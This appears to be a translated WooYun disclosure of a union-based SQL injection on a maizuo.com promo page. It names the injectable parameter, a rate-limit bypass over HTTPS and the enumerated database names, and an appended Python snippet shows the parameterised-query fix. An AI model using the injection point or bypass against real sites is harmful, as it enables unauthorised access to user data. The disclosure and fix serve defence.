WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-01-12: Details reported to the vendor, awaiting vendor handling
2015-01-13: Vendor confirmed; details disclosed to the vendor only
2015-01-23: Details disclosed to core white hats and relevant domain experts
2015-02-02: Details disclosed to regular white hats
2015-02-12: Details disclosed to intern white hats
2015-02-26: Details disclosed to the public
A MySQL injection (union supported) on the maizuo.com main site
Injection point:
http://www.maizuo.com/zt/index.htm?id=279
The id parameter is injectable. MySQL, union supported.
Requests to this site that arrive too fast get temporarily blocked, but I found a way around it:
HTTP requests that come too fast are indeed blocked, whereas over HTTPS they are never intercepted no matter how fast they come.
Current database user:
current user: '[email protected]'
Databases:
available databases [2]:
[*] dMaizuo_Manage
[*] information_schema
Tables: the database dMaizuo_Manage contains 82 tables.
The database presumably holds movie redemption codes and personal information; I did not dig any further.
Fix: parameter filtering, type conversion.
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-01-13 17:56
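As an added illustration of the two defects in this report (not code from the site or the reporter), the snippet below contrasts the vulnerable "splice ?id= into SQL" pattern with the recommended fix (type conversion plus a bound parameter), and shows a rate limiter keyed on client address only, so that switching to HTTPS does not give a client a separate request budget. The table, rows and addresses are constructed sample data and assume nothing about the real schema.

```python
import sqlite3
import time
from collections import defaultdict, deque

# Constructed in-memory stand-in for the promo-page table; not the site's real schema.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE zt_page (id INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO zt_page VALUES (?, ?)",
                 [(279, "promo 279"), (280, "promo 280")])


def lookup_unsafe(raw_id):
    """Vulnerable pattern: the raw ?id= value is spliced into the SQL text,
    so the database parses whatever the client sent as part of the query."""
    sql = "SELECT id, title FROM zt_page WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(raw_id):
    """Hardened: type conversion first (only a short all-digit string passes),
    then the integer is bound as a parameter, never concatenated."""
    if not raw_id.isdigit() or len(raw_id) > 10:
        raise ValueError("id must be a plain integer")
    return conn.execute("SELECT id, title FROM zt_page WHERE id = ?",
                        (int(raw_id),)).fetchall()


def rejects(raw_id):
    """True when lookup_safe refuses the value (convenience for checks)."""
    try:
        lookup_safe(raw_id)
        return False
    except ValueError:
        return True


class RateLimiter:
    """Sliding-window limit keyed on the client address only. The scheme is
    deliberately not part of the key, so HTTPS requests share the HTTP budget."""

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self.hits = defaultdict(deque)

    def allow(self, client_ip, scheme, now=None):
        now = time.time() if now is None else now
        q = self.hits[client_ip]          # key is the address, not (address, scheme)
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True
```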
Already being fixed; a gift will be sent later, thanks.
None yet.